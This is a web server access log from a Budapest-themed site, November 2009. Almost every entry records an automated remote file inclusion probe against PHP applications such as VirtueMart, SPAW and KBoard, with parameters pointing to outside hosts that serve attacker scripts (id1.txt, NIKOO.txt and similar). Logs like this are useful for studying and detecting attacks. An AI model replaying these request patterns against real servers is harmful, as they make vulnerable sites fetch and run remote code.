61.47.7.71 - - [01/Nov/2009:22:12:43 -0800] "GET /logs/access_090329.log%20%20/?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
61.47.7.71 - - [01/Nov/2009:22:12:43 -0800] "GET /?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
61.47.7.71 - - [01/Nov/2009:22:12:43 -0800] "GET /logs/?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 200 3369 "-" "Mozilla/5.0" "www.budapestcapital.com"
203.246.79.115 - - [01/Nov/2009:22:13:05 -0800] "GET /index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
203.246.79.115 - - [01/Nov/2009:22:13:05 -0800] "GET /logs/access_090401.log%20%20/index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
203.246.79.115 - - [01/Nov/2009:22:13:05 -0800] "GET /logs/index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
203.246.79.115 - - [01/Nov/2009:22:13:05 -0800] "GET /logs/access_090329.log%20%20/index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
203.246.79.115 - - [01/Nov/2009:22:14:48 -0800] "GET /logs/access_090401.log/index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
203.246.79.115 - - [01/Nov/2009:22:14:57 -0800] "GET /logs/access_090329.log/index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:22:17:20 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:22:17:20 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:22:17:20 -0800] "GET /logs/access_090329.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
79.64.241.7 - - [01/Nov/2009:22:18:05 -0800] "GET /index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:22:18:06 -0800] "GET /logs/access_090329.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:22:18:06 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:22:18:06 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
79.64.241.7 - - [01/Nov/2009:22:18:07 -0800] "GET /logs/index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
79.64.241.7 - - [01/Nov/2009:22:18:07 -0800] "GET /logs/access_090401.log%20%20/index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
79.64.241.7 - - [01/Nov/2009:22:18:47 -0800] "GET /logs/access_090329.log%20%20/index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:22:19:27 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:22:19:27 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:22:19:27 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 3375 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:22:19:35 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:22:19:35 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:22:19:35 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 3375 "-" "Mozilla/5.0" "www.budapestcapital.com"
79.64.241.7 - - [01/Nov/2009:22:20:07 -0800] "GET /logs/access_090401.log/index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
79.64.241.7 - - [01/Nov/2009:22:20:21 -0800] "GET /logs/access_090329.log/index.php?canal=http://www.hyonsvc.co.kr//bbs/skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
61.47.7.71 - - [01/Nov/2009:22:20:40 -0800] "GET /logs/access_090329.log/?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:22:21:17 -0800] "GET /logs/access_090329.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:22:21:41 -0800] "GET /logs/access_090329.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:22:22:24 -0800] "GET /logs/access_090329.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:22:22:32 -0800] "GET /logs/access_090329.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
218.149.84.14 - - [01/Nov/2009:22:26:27 -0800] "GET /logs/access_090329.log//?_SERVER[DOCUMENT_ROOT]=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
218.149.84.14 - - [01/Nov/2009:22:26:27 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.topclimat.ru/banners/id? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "www.budapestcapital.com"
218.149.84.14 - - [01/Nov/2009:22:26:28 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.topclimat.ru/banners/id? HTTP/1.1" 200 3374 "-" "libwww-perl/5.79" "www.budapestcapital.com"
84.234.251.135 - - [01/Nov/2009:23:15:49 -0800] "GET /?pagina=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
84.234.251.135 - - [01/Nov/2009:23:15:49 -0800] "GET /logs//?pagina=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
84.234.251.135 - - [01/Nov/2009:23:15:56 -0800] "GET /logs/access_090329.log//?pagina=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
84.234.251.135 - - [01/Nov/2009:23:15:56 -0800] "GET /?pagina=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
84.234.251.135 - - [01/Nov/2009:23:15:56 -0800] "GET /logs//?pagina=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
84.234.251.135 - - [01/Nov/2009:23:15:57 -0800] "GET /logs/access_090329.log//?pagina=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:23:24:55 -0800] "GET /login.php?dir=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:23:24:55 -0800] "GET /logs//login.php?dir=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:23:24:56 -0800] "GET /logs/access_090329.log%20%20//login.php?dir=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
69.175.44.162 - - [01/Nov/2009:23:36:48 -0800] "GET /scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.budapestcapital.com"
69.175.44.162 - - [01/Nov/2009:23:38:49 -0800] "GET /logs/access_090401.log/scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.budapestcapital.com"
69.175.44.162 - - [01/Nov/2009:23:38:49 -0800] "GET /scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.budapestcapital.com"
69.175.44.162 - - [01/Nov/2009:23:39:53 -0800] "GET /logs/access_090401.log/scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.budapestcapital.com"
69.175.44.162 - - [01/Nov/2009:23:39:53 -0800] "GET /scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.budapestcapital.com"
69.175.44.162 - - [01/Nov/2009:23:39:53 -0800] "GET /logs/scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.budapestcapital.com"
69.175.44.162 - - [01/Nov/2009:23:40:48 -0800] "GET /logs/access_090329.log/scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:23:41:01 -0800] "GET /logs/access_090329.log//login.php?dir=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
65.55.207.47 - - [01/Nov/2009:23:51:14 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.budapestcapital.com"
211.40.68.132 - - [02/Nov/2009:00:23:04 -0800] "GET /logs/access_090301.log/////?_SERVER[DOCUMENT_ROOT]=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.40.68.132 - - [02/Nov/2009:00:23:04 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.40.68.132 - - [02/Nov/2009:00:23:04 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 200 3377 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.40.68.132 - - [02/Nov/2009:00:23:12 -0800] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.40.68.132 - - [02/Nov/2009:00:26:28 -0800] "GET /logs/access_090301.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.40.68.132 - - [02/Nov/2009:00:26:35 -0800] "GET /logs/access_090329.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
65.55.207.47 - - [02/Nov/2009:00:28:10 -0800] "GET /budapest_guide.html HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.budapestcapital.com"
66.163.197.88 - - [02/Nov/2009:00:36:11 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [02/Nov/2009:00:36:11 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [02/Nov/2009:00:36:12 -0800] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [02/Nov/2009:00:36:25 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [02/Nov/2009:00:36:25 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [02/Nov/2009:00:36:25 -0800] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [02/Nov/2009:00:46:18 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [02/Nov/2009:00:46:27 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:00:47:32 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:00:47:32 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:00:47:32 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:00:47:34 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:00:47:34 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:00:47:34 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.205.54.26 - - [02/Nov/2009:00:49:52 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:50:32 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:50:32 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:50:32 -0800] "GET /logs/access_090329.log//?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:50:44 -0800] "GET /logs/access_090329.log//?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:50:44 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:50:44 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:52:51 -0800] "GET /logs/access_090329.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:52:51 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:52:51 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
119.63.198.28 - - [02/Nov/2009:00:53:21 -0800] "GET /logs/access.log HTTP/1.1" 200 440609 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:53:33 -0800] "GET /logs/access_090329.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:53:33 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:00:53:33 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.0" 200 3358 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:00:54:02 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:00:54:07 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.205.54.26 - - [02/Nov/2009:01:01:22 -0800] "GET /logs/access_090331.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
74.205.54.26 - - [02/Nov/2009:01:01:22 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
74.205.54.26 - - [02/Nov/2009:01:01:22 -0800] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
74.205.54.26 - - [02/Nov/2009:01:03:06 -0800] "GET /logs/access_090331.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
74.205.54.26 - - [02/Nov/2009:01:03:06 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
74.205.54.26 - - [02/Nov/2009:01:03:06 -0800] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:15:23 -0800] "GET /logs/access_090331.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:15:23 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:15:23 -0800] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:15:23 -0800] "GET /logs/access_090331.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:15:24 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:15:24 -0800] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:38:10 -0800] "GET /logs/access_090331.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:38:11 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:38:11 -0800] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:38:16 -0800] "GET /logs/access_090331.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:38:16 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [02/Nov/2009:01:38:17 -0800] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
124.115.6.11 - - [02/Nov/2009:01:39:36 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.budapestcapital.com"
91.186.15.126 - - [02/Nov/2009:01:40:13 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.coselle.com/adminpanel/linksdir/joomla.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.budapestcapital.com"
91.186.15.126 - - [02/Nov/2009:01:40:13 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.coselle.com/adminpanel/linksdir/joomla.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:02:02:37 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:02:02:37 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:02:02:37 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:02:03:27 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:02:03:27 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:02:03:27 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
